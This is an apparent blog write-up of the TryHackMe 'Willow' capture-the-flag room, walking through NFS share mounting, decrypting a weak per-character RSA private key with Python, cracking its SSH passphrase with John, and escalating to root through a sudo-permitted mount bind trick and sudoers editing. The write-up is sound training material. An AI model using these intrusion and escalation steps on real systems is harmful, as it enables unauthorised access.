TryHackMe Willow challenge

0xMat10
13 min read · May 9, 2023


What lies under the Willow Tree?

Hello N1NJ10. Today we will talk about the TryHackMe medium challenge called Willow. It is a very good room for those who love cryptography, coding, creativity and privilege escalation.

Let’s start, N1NJ10.

First, let’s see if we can reach our target with the ping command. After that we will do a full port scan with Nmap:

nmap -T4 -Pn --disable-arp-ping -A -n -sV -p- <IP>
[Screenshot: Nmap result]

OK, we seem to have an HTTP server and NFS (with rpcbind) here. Let’s start with HTTP.

Note: what the NFS protocol and rpcbind are, and how they are exploited (the original post links an article here).

[Screenshot: HTTP page]

It looks like hexadecimal. Let’s copy this text.

[Screenshot: copying the text]

Then identify what it says with CyberChef.

[Screenshot: CyberChef]

It says that you know where the decryption key is. Maybe there is something in the NFS shares we can access:

showmount -e <IP> 
[Screenshot: showmount output]

There is a failsafe directory exported. Let’s mount it:

mount -t nfs -o vers=2,nolock <IP>:/var/failsafe ./play/

Explanation: -t selects the filesystem type (nfs), vers the NFS protocol version, <IP>:/var/failsafe the exported path on the server, ./play/ the local mount point where I want the files to appear on my PC, and nolock disables file locking, which is occasionally required when connecting to older NFS servers.

[Screenshot: mounted!!]

I opened the directory and got a file called rsa_keys.

[Screenshot: rsa_keys file]

At first I didn’t understand what this meant. I tried to find a solution for this puzzle, to no avail, until I found that there is a hint in the first question.

After reading this amazing article (linked in the original post) I understood how to solve this puzzle. I found a couple of solutions.

The first one takes no effort at all. We have the encrypted private key and n=37625, d=61527, so we have all the parameters of the scheme: (encrypted_key ^ d) % n = private_key, applied to each number separately.

I found a website (linked in the original post) that can solve this scheme for us.

Let’s put in our parameters.

Pingo

Now we have our private key.

The second one is to build a Python script that does this for us:

numric_private_key = "2367 2367 2367 2367 2367 9709 8600 28638 18410 1735 33029 16186 28374 37248 33029 26842 16186 18410 23219 37248 11339 8600 33029 35670 8600 31131 2367 2367 2367 2367 2367 14422 26842 9450 14605 19276 2367 11339 33006 36500 4198 33781 33029 11405 5267 8600 1735 17632 16186 31131 26842 11339 8600 35734 14422 35734 8600 35670 2367 18410 35243 37438 14605 33781 33029 37248 8600 28374 2367 22149 27582 3078 2367 17632 9709 17632 5267 27582 8600 27582 23721 11405 13256 33985 37248 18278 33985 27582 26775 23721 26775 27582 22149 3078 3078 9709 11405 33985 18278 17632 37248 37248 33443 8600 18278 18278 27582 18330 13256 14422 14422 28061 10386 23219 10386 3339 25111 22053 21889 31131 33856 3339 16186 28061 7496 14605 22149 5851 35243 11339 33985 35243 22872 33443 33856 33443 22149 33856 8452 11339 7568 22053 22149 3947 29609 9709 35243 5851 11405 18199 13256 33215 33985 7568 33215 12244 5444 22053 14605 10386 7496 33215 3339 9709 10386 21889 8452 28061 28374 8499 12792 18199 20172 19276 8499 14422 22102 19396 12244 28061 23721 8452 27582 5851 19276 28374 12244 23721 26775 28374 18199 35243 13256 28927 23219 35243 35734 3339 33215 3339 22149 36500 14605 21404 27582 1735 35243 28638 12792 7496 27582 28061 33856 33856 28927 7568 11339 37438 37438 8452 3078 28374 28638 3339 9709 28927 28638 35243 19276 35734 4198 7914 18278 8600 37248 9709 18199 19276 20172 22149 14422 5444 11339 7496 12792 28638 7568 18199 29655 35243 21889 18199 12792 20172 31131 21404 20172 37248 33443 22053 21889 11339 7358 11339 21889 25111 5851 17632 21404 8499 12244 27582 21889 7496 37438 37248 21889 35734 33215 12244 8499 23219 18199 12792 31131 35670 12244 28638 37248 28927 28374 1735 4198 19396 8600 8600 27582 17632 20172 23219 29609 27582 8499 26775 27582 14422 13256 18199 9709 29609 1735 8600 20172 28638 7568 28927 35734 8600 18410 3339 7496 19276 3078 22149 29655 18278 18278 17632 31131 7568 31131 7358 11405 9450 8452 22053 9450 13256 33856 7914 8452 36500 17632 7358 3947 
33215 28638 11339 18278 35734 28374 23721 11339 5444 29609 27582 17632 33215 22872 21889 18199 3078 11339 17632 5444 33006 8452 28374 33215 8499 14422 28374 33856 12244 35670 22149 10386 36500 22102 12244 7568 5444 11405 26775 13256 11339 31131 20172 2950 7358 16186 21889 33215 3339 8499 7568 23219 22053 35670 33006 29655 22872 23721 23787 35243 26842 7568 26775 19396 12244 19396 3947 27582 10386 7496 27582 35734 33215 5444 33856 29655 20172 12244 14605 25111 2950 23787 8499 28061 3947 21404 18199 31131 7358 18330 14422 28061 3078 21889 22872 28927 33985 13256 33443 35734 8499 37248 8499 22102 18278 19396 33985 9450 26775 28374 11339 14605 31131 22872 12792 25111 8499 7914 18410 28061 25111 23219 8600 33215 22149 11405 33985 9709 2950 7358 17632 28374 11339 18199 8499 7358 33215 12244 27582 18199 14605 22102 28374 7358 3947 26842 27582 8600 18199 8600 18330 27582 18330 28927 22053 14422 22053 22053 33443 33006 5851 11339 35670 33215 18199 21889 33006 31131 27582 3339 7914 7496 13256 26775 31131 7496 26775 35670 19276 3947 23721 31131 3947 33006 36500 26775 19396 12792 5444 11339 7358 17632 7496 14605 36500 28638 8452 35670 21889 22149 19276 33856 7568 4198 3078 37248 12244 33985 8452 18330 9709 7358 9709 18330 22102 25111 7358 10386 7914 7358 14422 31131 16186 3078 26775 22149 1735 21889 9709 18278 18410 18410 29655 5851 18199 26842 22053 28374 19396 33443 21889 22872 26842 7496 11339 8499 22102 33985 28927 5851 36500 14605 28927 31131 36500 26842 28638 29609 28374 12244 9709 1735 7358 37248 22102 33985 23219 1735 23219 35670 33006 4198 16186 29609 22053 28061 37438 7358 22053 8452 26842 18330 7914 35670 26842 14422 29655 3078 5851 8600 21404 33215 16186 5851 29655 17632 27582 35734 35670 23787 18278 35670 22872 5851 21404 8452 3339 20172 18278 7496 7358 36500 19396 33006 17632 10386 10386 8452 28638 29609 9709 22053 3947 27582 26775 21889 22149 37248 7496 18330 3078 7568 18199 12792 7358 37438 36500 36500 37438 22149 18278 31131 19396 22149 18278 33215 3947 35670 
18330 35670 14422 10386 8452 35243 37438 3078 28927 19396 37248 1735 33985 22149 21404 29609 29655 4198 37438 28374 35734 14605 8600 17632 18278 7496 28638 9709 4198 12244 25111 8452 8452 22149 18330 23219 11339 19396 35243 23787 3947 27582 22149 33856 7568 8600 18330 33443 14605 33215 1735 29609 26775 37438 4198 3947 18199 18330 31131 3078 17632 36500 33443 9709 35670 8452 11405 14422 28638 5851 35243 31131 10386 33856 8452 11405 35734 3339 3947 19276 28061 28638 8600 23721 9450 21889 28638 18199 23219 1735 18199 21404 3339 11405 5851 8600 22149 11339 28374 18410 3947 13256 9450 11405 22872 37438 4198 5851 12244 18199 22053 9450 18278 21889 18410 18199 4198 11339 22053 23219 18410 33985 27582 26842 22872 25111 17632 4198 18199 28374 19396 12244 14422 12244 33215 3947 27582 12244 28374 12244 22872 8600 1735 5444 28374 22053 18278 7568 14605 8499 21404 21404 23787 33856 18199 9450 11405 35734 28374 20172 29609 28061 10386 18410 35243 28061 29609 26775 3947 33985 3947 7568 5851 5851 5444 21889 35734 9450 19396 28927 8600 18199 14605 18199 4198 18278 31131 33006 23219 8452 33985 3339 23219 33856 33443 5851 4198 14422 18278 18278 33006 8452 2950 19396 33215 20172 33215 18410 33443 33856 28374 31131 31131 1735 1735 37438 3339 3947 3078 10386 3947 22149 4198 4198 21889 27582 18199 7568 3339 8499 14605 7568 20172 12244 33985 18330 19276 2950 19396 23787 33215 7496 33443 21889 8600 2950 3339 22872 35243 8600 19276 23721 8600 12244 18330 11405 1735 21404 5444 3339 21889 18410 14422 35734 18199 8600 20172 23219 1735 18199 23721 28638 31131 21889 29609 27582 7568 20172 17632 3339 14605 28638 12244 13256 19396 33215 23219 3078 19276 20172 23219 11339 28374 35734 8499 7496 12244 1735 3339 33985 37438 3947 29609 18278 12244 7358 29655 1735 18278 37248 8452 7358 1735 18278 7496 3339 33856 28061 8499 11339 37248 26842 23787 33215 18410 22149 11339 14422 9709 8499 29609 22149 25111 35734 28374 33443 21404 21889 28927 33443 4198 19276 35670 7568 33006 12244 7358 23219 3947 29655 
20172 35243 14605 8452 28638 3078 21889 29655 35734 9450 28927 28927 23219 11405 35734 26842 33006 11339 33215 19396 35243 7496 36500 4198 9709 5851 28061 36500 28374 1735 4198 7914 7358 11405 7358 29655 8452 21404 11339 18199 7568 22149 14422 26842 17632 5851 35734 22872 37438 9709 8499 8600 37248 8600 37248 3947 8452 37438 20172 8600 22149 14605 22872 8499 7358 1735 5444 23787 33006 18278 20172 2950 20172 35670 35243 3078 28374 5851 26775 22872 4198 33985 37438 2950 21889 7496 8600 9709 20172 26842 7568 26842 1735 28374 22872 9450 8600 18199 5851 28927 28061 11405 29609 22053 22872 28374 12792 14422 22053 7358 8600 33006 22872 7914 3947 37248 21404 11339 35243 18199 35734 23721 7914 33215 21889 18278 33856 13256 8600 14605 20172 22102 11405 22149 7496 29655 9450 4198 9709 10386 27582 28374 33443 3339 12244 31131 28927 25111 26775 33215 33215 37248 7914 9709 35243 35734 33856 22872 35243 27582 33856 13256 31131 33856 37248 22102 28374 13256 33443 18278 33443 19396 14422 1735 22053 13256 37248 33006 11405 19396 21889 7914 21404 37438 31131 29609 21889 23721 3947 33985 14605 23219 3339 12244 8452 20172 35734 14605 8499 35243 3339 17632 33215 33985 3078 33856 1735 31131 28061 28061 2950 35734 23219 7496 35734 3947 27582 22149 25111 7568 22149 21889 16186 7496 14605 31131 21404 28374 8499 27582 37438 3947 7568 21404 17632 8499 7496 14422 37248 7358 23721 3078 26775 13256 36500 28927 29609 8600 23787 5444 5851 21889 33856 8452 16186 29609 29609 33443 18199 17632 20172 35734 4198 22102 33856 9709 22872 5851 5444 8452 9450 29609 4198 16186 8600 8600 33856 23787 22872 37248 23721 5851 3339 22872 23219 3947 18278 5444 23219 29655 7358 36500 28374 29655 7496 4198 22872 7358 18330 31131 18410 3339 14422 7358 21404 5851 33006 10386 7358 28927 11405 7568 33856 22102 20172 37248 11405 5851 7496 12792 35243 11339 23219 1735 22149 5851 35670 18330 23219 37248 7496 5851 18410 10386 25111 3078 21889 10386 23787 23219 10386 37438 19276 8452 35670 36500 3339 3339 7568 22102 36500 
12244 28638 5444 37438 29655 7358 9450 19276 22053 4198 33985 33985 7496 33215 29655 5851 14422 7358 18330 33856 28374 26842 3947 7568 37248 2950 26775 12244 8499 2950 36500 33006 7914 5851 7358 8452 9450 28927 29655 5851 23219 33006 1735 36500 23721 7496 33856 22053 10386 3078 8600 28638 22053 11405 20172 33985 28638 2950 3339 12792 10386 35734 23787 33006 28374 9709 17632 7914 22102 19276 29609 18330 21404 33443 23787 18278 8452 36500 35734 28638 21889 14422 3947 21889 33985 1735 37438 3078 11405 27582 18278 35734 33006 3947 7914 37248 8452 28374 22872 37248 7568 14605 29609 35734 18278 9709 29655 5851 19396 35243 37438 12244 7568 7914 22149 5444 11405 29655 1735 9450 22053 35243 28061 18199 35243 14605 29609 25111 29609 21404 20172 21404 28927 13256 28061 3339 8600 7914 3947 1735 19276 33215 8600 33856 11405 4198 14422 22872 13256 36500 33006 35734 29655 37248 3078 28927 14605 13256 12792 5851 11339 11339 29655 18330 5444 33856 33443 22872 23721 25111 9450 7358 18330 33006 22102 28638 4198 19276 33985 9450 8499 13256 3078 5444 11339 33985 20172 18278 29655 35734 31131 12244 26842 37248 11405 33443 19396 22053 23219 36500 9450 7496 37248 21889 35734 18278 33006 33856 4198 16186 11405 14422 2950 18278 21404 7358 28061 33443 16186 35734 37438 12792 23721 18410 23721 25111 33443 7358 22872 28374 3078 33006 17632 35670 33443 18330 36500 18330 33856 26842 21404 28374 37438 28061 20172 17632 33985 1735 35734 7358 33215 1735 3339 3947 37438 12792 21889 18330 37438 33215 18278 3947 36500 7568 35670 9709 31131 29609 31131 19396 23787 19276 8452 36500 5851 11405 14422 11339 28927 18199 33443 25111 31131 11405 3339 12244 5444 35243 8600 7358 23787 37248 21889 8600 9450 9450 12244 3947 23787 37438 3947 33985 7358 37248 8452 22872 35734 7358 28061 19396 9709 8452 7914 11405 27582 5851 21404 25111 8499 29609 22149 4198 18278 29609 7358 12792 27582 36500 4198 35243 17632 29609 23721 37438 3947 35243 14605 37438 12244 19396 19276 14422 2367 2367 2367 2367 2367 8600 1735 35734 
33029 16186 28374 37248 33029 26842 16186 18410 23219 37248 11339 8600 33029 35670 8600 31131 2367 2367 2367 2367 2367".split(" ")
n, d = 37627, 61527
clear_text_private_key = ""
for group in numric_private_key:
    # textbook RSA decryption of one character: m = c^d mod n
    ascii_code = pow(int(group), d, n)
    clear_text_private_key += chr(ascii_code)

print(clear_text_private_key)


"""

if you don't understand this code, try to understand this first:

text = [78, 49, 78, 74, 49, 48]   # ASCII codes of "N1NJ10"
key = ""
for i in text:
    key += chr(i)
print(key)

"""

Try to run it online with this website (linked in the original post); give it a shot.

[Screenshot: Python script]
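As an added example (not code from the original post), here is the same textbook RSA decryption written as reusable functions, using the n and d values from the script above. It goes a little beyond the walkthrough: it factors the 16-bit modulus by trial division to recover the public exponent, which is why such a small n gives no protection, and it counts repeated ciphertext groups, which is how the "-----" prefix of the key can be spotted before decrypting anything. The two groups 2367 and 8600 come from the rsa_keys data above; the round-trip message is constructed here.

```python
# Added example for the Willow rsa_keys puzzle: per-character textbook RSA.
# n and d are taken from the walkthrough's script; everything else is
# constructed for this example.
from __future__ import annotations

from collections import Counter

N = 37627  # modulus from the walkthrough's script
D = 61527  # private exponent from the walkthrough's script


def factor_small_modulus(n: int) -> tuple[int, int]:
    """Trial-divide a small RSA modulus into its two primes.

    Feasible only because n is 16 bits; a real RSA modulus is 2048+ bits.
    """
    p = 2
    while p * p <= n:
        if n % p == 0:
            return p, n // p
        p += 1
    raise ValueError("n has no non-trivial factor, not an RSA modulus")


def public_exponent(n: int, d: int) -> int:
    """Recover e = d^-1 mod phi(n) once n is factored (needs Python 3.8+)."""
    p, q = factor_small_modulus(n)
    phi = (p - 1) * (q - 1)
    return pow(d, -1, phi)


def decrypt_groups(groups, n: int = N, d: int = D) -> str:
    """Decrypt one ciphertext group per character: m = c^d mod n."""
    return "".join(chr(pow(int(c), d, n)) for c in groups)


def encrypt_text(text: str, n: int, e: int) -> list[int]:
    """Encrypt one character per group: c = m^e mod n (no padding, so
    the same character always produces the same group)."""
    return [pow(ord(ch), e, n) for ch in text]


def repeated_groups(groups) -> dict[int, int]:
    """Ciphertext groups that occur more than once, with their counts.

    Deterministic per-character RSA maps equal plaintext bytes to equal
    ciphertext groups, so the repeats leak the plaintext's structure
    (the five leading 2367 groups in rsa_keys are the five dashes).
    """
    counts = Counter(int(g) for g in groups)
    return {c: k for c, k in counts.items() if k > 1}


if __name__ == "__main__":
    # Two groups taken from the rsa_keys file shown in the walkthrough.
    print(decrypt_groups(["2367", "8600"]))  # -E
    e = public_exponent(N, D)
    sample = "-----BEGIN KEY-----"  # constructed message for a round trip
    ciphertext = encrypt_text(sample, N, e)
    print(decrypt_groups(ciphertext) == sample)
    print(repeated_groups(ciphertext))
```

Using pow(c, d, n) instead of (c ** d) % n keeps the intermediate values small; with d = 61527 the plain exponentiation builds integers of hundreds of thousands of bits for every character before reducing them.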

We now have the private key, so let’s try to access the machine with it first:

ssh -i private_key willow@<IP>
[Screenshot: we need the passphrase]

It seems we must have the key’s passphrase to get in. I prefer John for this task.

Note: you should change the key’s permissions with chmod 600 private_key, otherwise SSH refuses to use it.

ssh2john private_key > paraphrase.txt
john --wordlist=/usr/share/wordlists/rockyou.txt paraphrase.txt
wildflower!!

Note: don’t make my mistake and forget the = sign; this screen will appear if you do.

Good, we now have the passphrase. Let’s get in.

[Screenshot: we are in]

Now we are in. Let’s find our user flag.

[Screenshot: user.jpg]

We find that there is a user.jpg file. We can’t open it on the victim machine, so I decided to copy it to my machine:

scp -i private_key willow@<IP>:user.jpg .
[Screenshot: copying user.jpg]

Open it:

[Screenshot: user flag]

Let’s get the root account. I found that we have sudo privileges on the mount command for paths under the /dev directory:

sudo -l
[Screenshot: mount!!]

So I went to GTFOBins to search for a way to escalate my privileges.

[Screenshot: GTFOBins]

Give it a shot:

mount -o bind /bin/sh /bin/mount
[Screenshot: Ammmm, it did not work]

OK, let’s do it manually:

cp ../../bin/bash ../../dev/shm/
sudo /bin/mount /dev/shm/bash /bin/mount -o force,bind
echo "bash" > /dev/shm/shell
sudo /bin/mount /dev/shm/shell

Note: why did I use shm? /dev/shm is a temporary file storage filesystem (see tmpfs) that uses RAM for storage. It can function as shared memory that facilitates IPC. It is a world-writable directory, and its size is limited by the spare RAM on the system, so you are more likely to run out of space on this filesystem. Being world-writable, it is a place we are guaranteed to be able to write to.

[Screenshot: root account]

Pingo, we have the root account. Let’s open the root flag.

[Screenshot: what??]

I couldn’t understand what happened here.

After a while I understood that I had thought outside the box and got the root account in a way the author didn’t intend. So I escalated the willow account’s privileges by editing the sudoers file.

[Screenshot: now willow is root]

Now we can start over again with the willow account.

[Screenshot: willow is really a sudoer]

After a while I found that there is a hidden entry in /dev called “hidden_backup”.

[Screenshot: hidden_backup]

So I mounted it under my own directory to see what is inside it:

mkdir N1NJ10
sudo mount /dev/hidden_backup N1NJ10/
cd N1NJ10/
ls -la
cat creds.txt
[Screenshot: Who is N1NJ10?]

OK, this is the way the author wanted us to think, but we still haven’t reached the root flag!

I thought again about his message “I actually gave you the root flag some time ago”. I remembered that we got user.jpg; maybe he put a secret message in it. Let’s check it with steghide:

steghide info user.jpg 
[Screenshot: root.txt]

Well, it has an embedded file called root.txt. You can access it with a passphrase, which is the root password.

Let’s extract it:

steghide extract -sf user.jpg
cat root.txt
[Screenshot: root flag]

Pingo, we have the root flag now.

Now you are done, N1NJ10. I hope you have benefited from this writeup. If anything doesn’t make sense you can reach me on social media.

I enjoyed the room, and will post more walkthroughs for TryHackMe rooms and other security stuff in the future.
